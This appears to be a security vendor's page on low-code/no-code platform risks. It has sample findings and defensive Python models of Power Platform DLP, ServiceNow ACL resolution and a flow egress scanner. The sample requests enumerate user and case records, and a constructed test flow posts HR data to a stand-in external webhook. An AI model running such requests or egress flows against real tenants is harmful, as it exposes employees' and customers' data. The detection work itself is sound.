Low-Code & No-Code Security

The Attack Surface Your Developers Can’t See.

Citizen developers build with production access, live data connectors, and connections that run as privileged service accounts outside the controls your security team put in place. We test the platforms, the integrations, and the automations, mapped to the OWASP Low-Code/No-Code Top 10.

OWASP LCNC Top 10 coverage · 5 major platforms tested · Connector & automation focus · Zero-trust posture validation
The Problem

Three Reasons LCNC Platforms Are a Security Blind Spot.

No visibility into what was built

Security teams rarely have insight into what citizen developers have built, which data sources they’ve connected, or which service accounts they’re reusing. Shadow IT that lives natively inside sanctioned platforms is invisible to traditional discovery tooling.

Production access by default

Low-code platforms run automations under the credentials of whoever created the connection, not of the person who triggers the flow. When that creator is an administrator, a misconfigured flow carries administrator permissions into every action it takes, and nothing between the canvas and the production data tier narrows them to what the flow actually needs.

Your controls don’t apply here

DLP policies, network segmentation, and data classification labels designed for traditional apps often have no enforcement path inside Power Automate, Salesforce Flows, or ServiceNow workflows. The platform runs outside the boundary you secured.

Platform Coverage

Five Platforms. Every Layer of the LCNC Stack.

Select a platform to see what gets tested and which OWASP LCNC Top 10 categories apply.

Microsoft Power Platform

Power Apps · Power Automate · Power BI · Dataverse

  • Shared connections run as their creator Power Platform connections belong to the user who created them. When a connection is shared, or a flow is shared with co-owners, everyone who can use it calls the data source as that user, so a single shared connection silently lifts every co-owner to the creator's permission level, with no authorization check in the maker's own name.
  • DLP policy bypass via unclassified connectors A DLP policy constrains only the connectors it explicitly classifies; everything else lands in the policy's default group, and newly released connectors arrive there automatically. If the default group is Business, or the policy is not applied to the environment the flow lives in, an unclassified connector can be paired with business data sources and move data out even though a policy is nominally enforced.
  • Row filtering done in the canvas, not at the source Galleries and forms that narrow records with a client-side Filter() over a Dataverse table or SharePoint list the whole user base can read give only the appearance of row-level security: any user can query the same table directly through the connector, a flow, or the Dataverse Web API and retrieve every row. Where the source is reached through a connection with explicit credentials (SQL authentication, an API key, a service principal), the source-side permissions are the connection owner's, not the user's.
  • Power BI embedded credentials and workspace-role RLS bypass Datasets published with stored data-source credentials let every reader query through them, and row-level security is enforced only for users with read-only access (the Viewer role or dataset read permission): workspace Admins, Members, and Contributors bypass it and can retrieve the unfiltered model with DAX through the XMLA endpoint or the executeQueries REST API.
LCNC-SEC-01 Account Impersonation · LCNC-SEC-03 Data Leakage and Unexpected Consequences · LCNC-SEC-05 Security Misconfiguration
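As an added illustration of the default-group behaviour described under DLP policy bypass (this is example code written for this page, not Microsoft's implementation nor the assessment tooling), the Python below models how a Power Platform DLP policy decides whether a flow's connectors may be combined: any Blocked connector fails the flow, Business and Non-Business connectors may not mix, and a connector the policy does not name inherits the policy's default group. The policy contents, connector IDs, environment names and flows are constructed; the same logic can be run over a real tenant's policies exported with `Get-DlpPolicy` from the Microsoft.PowerApps.Administration.PowerShell module.

```python
"""Model of Power Platform DLP connector-group evaluation (added example).

Rules mirrored from the documented DLP behaviour:
  * a flow that uses any connector in the Blocked group cannot run;
  * Business and Non-Business connectors may not appear in the same flow;
  * a connector the policy does not classify falls into the policy's default
    group, so a default of Business quietly lets new connectors pair with
    business data; a policy only applies to the environments it targets.
Policy contents, environment names and flows below are constructed test data.
"""
from dataclasses import dataclass, field

BUSINESS, NON_BUSINESS, BLOCKED = "Business", "NonBusiness", "Blocked"


@dataclass
class DlpPolicy:
    name: str
    environments: set[str]                       # environments the policy targets
    business: set[str] = field(default_factory=set)
    non_business: set[str] = field(default_factory=set)
    blocked: set[str] = field(default_factory=set)
    default_group: str = NON_BUSINESS            # where unclassified connectors land

    def group_of(self, connector: str) -> str:
        if connector in self.blocked:
            return BLOCKED
        if connector in self.business:
            return BUSINESS
        if connector in self.non_business:
            return NON_BUSINESS
        return self.default_group                # undeclared: silently defaulted

    def unclassified(self, connectors: set[str]) -> set[str]:
        """Connectors whose treatment depends only on the default group."""
        return connectors - self.business - self.non_business - self.blocked


def evaluate_flow(environment: str, connectors: set[str],
                  policies: list[DlpPolicy]) -> tuple[bool, str]:
    """Return (allowed, reason). Every policy targeting the environment must pass."""
    applicable = [p for p in policies if environment in p.environments]
    if not applicable:
        return True, "no DLP policy targets this environment"
    for p in applicable:
        groups = {c: p.group_of(c) for c in connectors}
        blocked = sorted(c for c, g in groups.items() if g == BLOCKED)
        if blocked:
            return False, f"{p.name}: blocked connector(s) {blocked}"
        if BUSINESS in groups.values() and NON_BUSINESS in groups.values():
            return False, f"{p.name}: mixes Business and Non-Business connectors"
    return True, "allowed by " + ", ".join(p.name for p in applicable)


# Constructed policies: 'strict' leaves the default group at Non-Business,
# 'lax' moved it to Business "so that new connectors don't break flows".
STRICT = DlpPolicy("strict", {"prod"},
                   business={"shared_sharepointonline", "shared_commondataserviceforapps"},
                   non_business={"shared_twitter"}, blocked={"shared_dropbox"})
LAX = DlpPolicy("lax", {"prod"}, business={"shared_sharepointonline"},
                default_group=BUSINESS)

# A flow copying SharePoint data to a connector neither policy classifies.
FLOW = {"shared_sharepointonline", "shared_googledrive"}


def demo() -> dict[str, tuple[bool, str]]:
    return {
        "strict/prod": evaluate_flow("prod", FLOW, [STRICT]),
        "lax/prod": evaluate_flow("prod", FLOW, [LAX]),
        "strict/dev": evaluate_flow("dev", FLOW, [STRICT]),   # environment not targeted
        "strict/blocked": evaluate_flow("prod", {"shared_sharepointonline", "shared_dropbox"}, [STRICT]),
    }


if __name__ == "__main__":
    for case, (ok, why) in demo().items():
        print(f"{case:16} {'ALLOW' if ok else 'BLOCK':5} {why}")
    print("riding on the default group:", sorted(LAX.unclassified(FLOW)))
```

The two cases worth reviewing in a real tenant are the ones the model makes visible: flows that are allowed only because an unclassified connector happened to land in a Business default group, and environments that no policy targets at all. Listing `unclassified()` per policy against the connectors actually in use is the quickest way to find both.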
Sample Finding HIGH

Shared Connector Grants Admin-Level SharePoint Access to All Makers

Affected path Power Automate → SharePoint connector (shared)
LCNC-SEC-03 LCNC-SEC-01

The SharePoint connection was created by a Global Admin and shared across the development environment. All 47 makers it is shared with can build and run flows that read, write, and delete any item in every site collection the creating account can reach; SharePoint authorizes each call as the connection owner, and the platform performs no additional check against the maker's own identity at flow execution time.

Salesforce Platform

Sales Cloud · Service Cloud · Experience Cloud · Apex · Flows

  • Guest user object access Experience Cloud sites expose internal objects to unauthenticated visitors when the guest user profile carries object and field permissions it does not need, or guest user sharing rules open more records than the public page requires; a common outcome of high-velocity deployments.
  • Apex sharing and system-mode privilege escalation Apex runs in system mode, so object and field-level security are not enforced unless the code opts in (WITH SECURITY_ENFORCED, WITH USER_MODE, Security.stripInaccessible). A class declared without sharing, or one with no sharing keyword at the top of the call stack, additionally ignores record-level sharing. Reached through triggers, @AuraEnabled methods, or public REST endpoints by lower-privileged callers, such code returns records the caller could never query directly.
  • SOQL injection via user-controlled input Custom Apex controllers and Flow-invocable actions that concatenate user-supplied strings into dynamic SOQL (Database.query) are injectable, and because the query runs in system mode the injected clause can pull records beyond both the caller's sharing model and field-level security unless the query uses bind variables, String.escapeSingleQuotes, or WITH USER_MODE.
  • Connected app over-permission OAuth scopes granted to connected apps frequently exceed what the integration does, giving a third party access to objects and actions it never uses; paired with a long-lived refresh token, a compromised integration becomes broad API access. This violates least privilege at the API authorization layer.
LCNC-SEC-02 Authorization Misuse · LCNC-SEC-05 Security Misconfiguration · LCNC-SEC-06 Injection Handling Failures
Sample Finding CRITICAL

Experience Cloud Guest User Reads All Internal Case Records

Affected query SELECT Id, Subject, Description FROM Case
-- guest profile has Read on Case; a guest user sharing rule shares every Case record with the site guest user
LCNC-SEC-02 LCNC-SEC-05

During an expedited deployment the Experience Cloud guest user profile was granted Read access to the Case object, and a guest user sharing rule whose criteria match every record was added. Guest users only see records shared to them by such rules, so this one rule opens the entire object: an unauthenticated site visitor can enumerate all 83,000+ case records, including personally identifiable information and internal notes.

ServiceNow Platform

ITSM · HRSD · CSM · Service Portal · Integration Hub

  • Table API exposure through wildcard ACLs Any table can be queried through the Table API (/api/now/table/<table>); what protects it is the read ACL, and a table with no ACL of its own falls back to its parent table's and then to the `*` wildcard ACL. Where the deciding ACL's condition evaluates true for any authenticated session, or the public role has been added to it, every low-privilege account, or an unauthenticated caller, can list the table.
  • Client-callable Script Include privilege escalation Script Includes marked Client callable are reachable from any browser session through GlideAjax and execute server-side. When one is also Accessible from all application scopes and its methods perform no role check of their own, any authenticated user can drive privileged server-side logic, including from an application scope that was never meant to call it.
  • Service Portal widget injection Widget HTML templates and client scripts that render user-controlled field values as trusted HTML (ng-bind-html with $sce.trustAsHtml, or strings concatenated into the DOM) are vulnerable to stored XSS, executing attacker-supplied JavaScript in the session of any authenticated user who views the portal page.
  • Integration Hub spoke credential storage Spoke connections reference credential records held as password2 fields in the platform's own credential tables. Anyone who can run server-side script (Scripts - Background, a Business Rule, a Fix Script) can decrypt and read them, which sidesteps whatever controls the external vault was supposed to impose.
LCNC-SEC-02 Authorization Misuse · LCNC-SEC-06 Injection Handling Failures · LCNC-SEC-08 Data and Secret Handling Failures
Sample Finding HIGH

sys_user Table Exposed via REST API Without ACL Restriction

Affected endpoint GET /api/now/table/sys_user?sysparm_fields=user_name,email,mobile_phone&sysparm_limit=10000
LCNC-SEC-02 LCNC-SEC-05

The sys_user read ACL was inadvertently removed during a platform upgrade, so access to the table now falls through to the `*` wildcard ACL. Any authenticated session, including Integration Hub service accounts shared with third-party vendors, can enumerate all user records through the Table API. The response includes usernames, email addresses, and mobile phone numbers for 4,200 employees.
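To show why removing one table ACL widens access rather than closing it, here is an added example (written for this page; not ServiceNow's code and not the assessment tooling) that models table-level read ACL resolution the way the platform documents it: ACLs on the table itself are tried first, then the parent table's, then the `*` wildcard, and the first level that has any ACL decides; the caller must satisfy at least one ACL at that level. The ACL rows, roles, table hierarchy and the default-deny setting are constructed, and field-level ACLs and script conditions are left out.

```python
"""Simplified ServiceNow table-level read ACL resolution (added example).

Resolution order modelled on the documented behaviour: ACLs named for the
table itself, then its parent table(s), then the '*' wildcard; the first
level with any ACL decides, and the caller must pass at least one ACL there
(hold one of its roles, and satisfy its condition).  Field-level ACLs and
script conditions are out of scope.  Tables, roles and ACL rows are
constructed to resemble sys_security_acl records, not exported from an instance.
"""
from dataclasses import dataclass, field
from typing import Callable, Optional

# Assumption: High Security Settings default (glide.sm.default_mode = deny),
# i.e. a table with no ACL anywhere in its lineage is not readable.
DEFAULT_DENY = True


@dataclass
class Acl:
    table: str                                    # '*' = wildcard record ACL
    roles: set[str] = field(default_factory=set)  # any one role satisfies; empty = no role needed
    condition: Optional[Callable[[dict], bool]] = None


# constructed table hierarchy: child -> parent (None = base table)
PARENT = {"sys_user": None, "task": None, "incident": "task", "x_vendor_ticket": "task"}


def lineage(table: str) -> list[str]:
    """Table, its ancestors in order, then the wildcard."""
    chain = []
    while table is not None:
        chain.append(table)
        table = PARENT.get(table)
    return chain + ["*"]


def deciding_level(table: str, acls: list[Acl]):
    """First level (table, parent..., '*') that carries any read ACL."""
    for level in lineage(table):
        rules = [a for a in acls if a.table == level]
        if rules:
            return level, rules
    return None, []


def passes(acl: Acl, user: dict) -> bool:
    role_ok = not acl.roles or bool(acl.roles & user["roles"])
    return role_ok and (acl.condition is None or acl.condition(user))


def can_read(table: str, user: dict, acls: list[Acl]) -> bool:
    level, rules = deciding_level(table, acls)
    if level is None:
        return not DEFAULT_DENY
    return any(passes(a, user) for a in rules)


def readable(user: dict, acls: list[Acl], tables: list[str]) -> list[str]:
    return sorted(t for t in tables if can_read(t, user, acls))


# Constructed baseline: specific ACLs on sys_user and task, wildcard for the rest.
def baseline_acls() -> list[Acl]:
    return [
        Acl("sys_user", roles={"user_admin", "admin"}),
        Acl("task", roles={"itil", "admin"}),
        Acl("x_vendor_ticket", roles={"x_vendor.integration", "admin"}),
        Acl("*", condition=lambda u: u["authenticated"]),   # any logged-in session
    ]


def after_upgrade_acls() -> list[Acl]:
    """Same ruleset with the sys_user read ACL missing, as in the finding above."""
    return [a for a in baseline_acls() if a.table != "sys_user"]


# Constructed vendor integration account: one scoped role, no ITSM or user-admin roles.
VENDOR = {"user": "svc_vendorhub", "roles": {"x_vendor.integration"}, "authenticated": True}
TABLES = ["sys_user", "incident", "x_vendor_ticket", "cmn_location"]

if __name__ == "__main__":
    print("before upgrade:", readable(VENDOR, baseline_acls(), TABLES))
    print("after upgrade: ", readable(VENDOR, after_upgrade_acls(), TABLES))
```

The practical check against a real instance is to list sys_security_acl rows with operation=read for every table holding sensitive data and confirm each has an ACL of its own; a table whose deciding ACL is `*` is readable by whoever `*` admits, regardless of what the upgrade notes said.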

Enterprise LCNC Platforms

Mendix · OutSystems · Appian · Pega

  • Broken object-level authorization Entity access rules defined in the platform model are not consistently enforced at the REST API layer the runtime generates, allowing direct object retrieval by GUID with no check that the requesting identity holds a role entitled to that object.
  • Insecure microflow and action execution Privileged server-side microflows and actions callable through the platform's public API layer without an explicit role check at the action boundary; the designer assumed a UI-layer guard was sufficient.
  • Multi-tenant isolation failures In multi-tenant deployments, application-level tenant discriminators that are not enforced in the data access layer allow cross-organization data retrieval when an authenticated user from one tenant crafts requests that reference another tenant's object identifiers.
  • Deployment pipeline credential exposure Service account credentials and API keys embedded in CI/CD pipeline configuration files, deployment scripts, or version-controlled application constants, readable by every developer with repository read access.
LCNC-SEC-02 Authorization Misuse · LCNC-SEC-03 Data Leakage and Unexpected Consequences · LCNC-SEC-08 Data and Secret Handling Failures
Sample Finding HIGH

Mendix API Action Callable Without Role Check on Requesting Identity

Affected endpoint POST /xas/action/RetrieveAllCustomerData
Authorization: Bearer <any-valid-session-token>
LCNC-SEC-02 LCNC-SEC-05

The RetrieveAllCustomerData microflow was exposed through the REST interface without restricting the roles allowed to execute it. Any authenticated user, including those holding only the Viewer role, can invoke the action and receive the full customer dataset. The UI presents the action only to Admin users, which created the false assumption that the back end is restricted the same way.

Risks That Apply to Every Platform

Pattern-level risks present regardless of the LCNC vendor or deployment model

  • Service account impersonation Automation credentials shared across unrelated processes mean that any flow, workflow, or integration running under the shared account acts on behalf of the original identity, with no per-process isolation and no audit trail that distinguishes which process took an action.
  • Workflow data exfiltration Flows triggered by external HTTP events, email parsing, or scheduled timers can export production records to external storage, personal cloud drives, or unmanaged webhook endpoints, entirely within the platform's approved operations and invisible to CASB or DLP tooling that watches the network rather than the platform.
  • Tenant isolation bypass via connector sharing Connector sharing across organizational units or guest tenants allows automations in one business unit to consume data connections provisioned by and scoped to another, crossing data residency boundaries without triggering any access-control alert.
  • Logging and monitoring gaps Management events (a flow created, edited, or shared) may reach the tenant audit log, but the runs themselves, what each action read and where it wrote, rarely produce a structured trail a SIEM can consume. Run history is retained only within the platform's native interface, inaccessible to centralized log aggregation, and purged on vendor-defined retention schedules.
LCNC-SEC-01 Account Impersonation · LCNC-SEC-03 Data Leakage and Unexpected Consequences · LCNC-SEC-10 Security Logging and Monitoring Failures
Sample Finding HIGH

Automation Flow Writes Data to External Storage Without Generating an Audit Log

Data flow path Power Automate → SharePoint List (source)
→ OneDrive Personal (destination, unmanaged)
LCNC-SEC-03 LCNC-SEC-10

A scheduled Power Automate flow copies SharePoint list items, including a column containing employee salary bands, to a personal OneDrive account every 24 hours. The flow runs under a shared service account. Its run history is visible only in the Power Automate portal and is not forwarded to the organization's Sentinel SIEM, so nothing in the SIEM records what the flow read or where it wrote. The flow has been executing undetected for 14 months.
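Because run history stays inside the platform, the practical detection for this finding is to review flow definitions rather than wait for run logs. The Python below is an added example (written for this page; not the assessment tooling and not a Microsoft API) that scans a Power Automate flow definition for the pattern above: a managed source connector feeding an unmanaged sink connector or a non-allowlisted HTTP endpoint, on a scheduled trigger, through a connection belonging to a shared service account. The JSON layout follows the shape of exported flow definitions (properties.connectionReferences plus properties.definition.triggers and actions carrying inputs.host.apiId and operationId), but the two flows, the connection names, the shared-connection inventory and the HTTP allowlist are constructed; real definitions can be exported from the portal as a package (definition.json) or retrieved with the Power Platform admin cmdlets.

```python
"""Scan Power Automate flow definitions for silent data egress (added example).

Flags a managed source connector feeding an unmanaged sink connector or a
non-allowlisted HTTP endpoint, notes whether the trigger is a schedule, and
whether a connection belongs to a known shared service account.  The JSON
shape follows exported flow definitions (properties.connectionReferences and
properties.definition.triggers/actions with inputs.host.apiId/operationId);
the flows, connection names, SHARED_SERVICE_CONNECTIONS and HTTP_ALLOWLIST
are constructed.  Only top-level actions are walked; scopes are not descended.
"""
import json
from urllib.parse import urlparse

API_PREFIX = "/providers/Microsoft.PowerApps/apis/"
MANAGED_SOURCES = {"shared_sharepointonline", "shared_commondataserviceforapps",
                   "shared_onedriveforbusiness", "shared_sql"}
UNMANAGED_SINKS = {"shared_onedrive", "shared_dropbox", "shared_googledrive", "shared_gmail"}
WRITE_OPS = ("Create", "Update", "Copy", "Upload", "Send", "Put")   # heuristic on operationId
SHARED_SERVICE_CONNECTIONS = {"svc-automation-shared"}              # constructed inventory
HTTP_ALLOWLIST = {"graph.microsoft.com", "api.corp.example"}        # constructed allowlist


def op(connector, operation, **params):
    """Build an OpenApiConnection action/trigger the way the designer serialises it."""
    return {"type": "OpenApiConnection",
            "inputs": {"host": {"connectionName": connector, "operationId": operation,
                                "apiId": API_PREFIX + connector}, "parameters": params}}


def connector_of(action) -> str:
    inputs = action.get("inputs")
    host = inputs.get("host", {}) if isinstance(inputs, dict) else {}
    return host.get("apiId", "").rsplit("/", 1)[-1]


def analyse_flow(definition_json: str) -> dict:
    flow = json.loads(definition_json)["properties"]
    defn, refs = flow["definition"], flow.get("connectionReferences", {})
    sources, sinks, hosts, shared = set(), set(), set(), set()
    for action in defn.get("actions", {}).values():
        if action.get("type") == "Http":
            hosts.add(urlparse(action["inputs"]["uri"]).hostname)
            continue
        conn = connector_of(action)
        if not conn:
            continue                                  # Compose, Condition, variables
        operation = action["inputs"]["host"].get("operationId", "")
        if conn in MANAGED_SOURCES:
            sources.add(conn)
        if conn in UNMANAGED_SINKS and operation.startswith(WRITE_OPS):
            sinks.add(conn)
        if refs.get(conn, {}).get("connectionName") in SHARED_SERVICE_CONNECTIONS:
            shared.add(conn)
    findings = []
    if sources and sinks:
        findings.append("EGRESS_UNMANAGED_CONNECTOR")
    if sources and (hosts - HTTP_ALLOWLIST):
        findings.append("EGRESS_EXTERNAL_HTTP")
    if shared:
        findings.append("SHARED_SERVICE_CONNECTION")
    trigger = next(iter(defn.get("triggers", {}).values()), {})
    return {"name": flow["displayName"], "findings": findings,
            "scheduled": trigger.get("type") == "Recurrence",
            "sources": sorted(sources), "sinks": sorted(sinks),
            "hosts": sorted(h for h in hosts if h), "shared_connections": sorted(shared)}


# Constructed: the finding above, plus a benign flow for contrast.
SUSPECT_FLOW = json.dumps({"properties": {
    "displayName": "HR list sync",
    "connectionReferences": {
        "shared_sharepointonline": {"connectionName": "svc-automation-shared",
                                    "id": API_PREFIX + "shared_sharepointonline"},
        "shared_onedrive": {"connectionName": "9c4e-personal", "id": API_PREFIX + "shared_onedrive"}},
    "definition": {
        "triggers": {"Recurrence": {"type": "Recurrence",
                                    "recurrence": {"frequency": "Day", "interval": 1}}},
        "actions": {
            "Get_items": op("shared_sharepointonline", "GetItems",
                            dataset="https://corp.sharepoint.com/sites/HR", table="EmployeeBands"),
            "Create_file": op("shared_onedrive", "CreateFile", folderPath="/exports",
                              name="bands.csv", body="@body('Get_items')"),
            "Post_copy": {"type": "Http", "inputs": {"method": "POST",
                          "uri": "https://hooks.example.net/ingest", "body": "@body('Get_items')"}}}}}})

BENIGN_FLOW = json.dumps({"properties": {
    "displayName": "Archive to OneDrive for Business",
    "connectionReferences": {
        "shared_sharepointonline": {"connectionName": "1a2b-maker", "id": API_PREFIX + "shared_sharepointonline"},
        "shared_onedriveforbusiness": {"connectionName": "3c4d-maker",
                                       "id": API_PREFIX + "shared_onedriveforbusiness"}},
    "definition": {
        "triggers": {"When_an_item_is_created": op("shared_sharepointonline", "GetOnNewItems")},
        "actions": {"Create_file": op("shared_onedriveforbusiness", "CreateFile",
                                      folderPath="/archive", name="item.json")}}}})

if __name__ == "__main__":
    for raw in (SUSPECT_FLOW, BENIGN_FLOW):
        print(json.dumps(analyse_flow(raw), indent=2))
```

Run over every flow in an environment this gives a daily inventory of egress paths that the run history alone never surfaces. Pair it with the flow create/edit events the tenant audit log does record, and alert on any definition change that introduces an unmanaged sink or a new external host.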

OWASP LCNC Top 10

Every Category. Tested Across Every Platform.

The OWASP Low-Code/No-Code Top 10 is the community reference taxonomy for LCNC platform risk. Every engagement covers all ten categories regardless of the platforms in scope.

LCNC-SEC-01

Account Impersonation

Automation running under a shared service account impersonates a privileged user, granting every process that shares the credential the full rights of the account owner.

LCNC-SEC-02

Authorization Misuse

Platform actions callable without the role check the designer assumed was enforced, because UI-layer guards are not replicated at the API, microflow, or record-access boundary.

LCNC-SEC-03

Data Leakage and Unexpected Consequences

Automations that move data where it should not go: connectors that sync, copy, or forward production records to external storage, personal accounts, or unintended recipients, and flows whose side effects reach beyond what the maker planned.

LCNC-SEC-04

Authentication and Secure Communication Failures

Connections and integrations built on weak, hard-coded, or over-scoped credentials and on insecure or unverified endpoints, so that anyone who can edit the automation can authenticate as its service account.

LCNC-SEC-05

Security Misconfiguration

Platform settings left at permissive defaults: DLP default groups, guest profiles, missing ACLs, over-broad sharing, and environment-wide connections that nobody configured deliberately.

LCNC-SEC-06

Injection Handling Failures

User-controlled input flowing unvalidated into dynamic queries, scripts, HTTP calls, or rendered portal pages: SOQL injection, stored XSS in widgets, and crafted trigger payloads that drive unintended logic at the service account's privilege.

LCNC-SEC-07

Vulnerable and Untrusted Components

Third-party connectors, marketplace plugins, and community templates introduced without security vetting: an unreviewed supply chain inside a trusted platform.

LCNC-SEC-08

Data and Secret Handling Failures

Secrets and sensitive data stored in plaintext within platform configurations, connection records, application constants, or version-controlled deployment scripts, readable by every developer with access to them.

LCNC-SEC-09

Asset Management Failures

Abandoned apps, decommissioned flows, and forgotten integrations retaining active credentials and live data access long after the business process they served was retired.

LCNC-SEC-10

Security Logging and Monitoring Failures

Platform automation producing no structured audit trail consumable by a SIEM, with run histories siloed inside the platform portal and purged on vendor-defined schedules.

Running Power Platform, Salesforce, or ServiceNow?

Tell us which platforms are in scope, your data classification requirements, and any existing DLP policies. We will return a targeted assessment scope within 48 hours.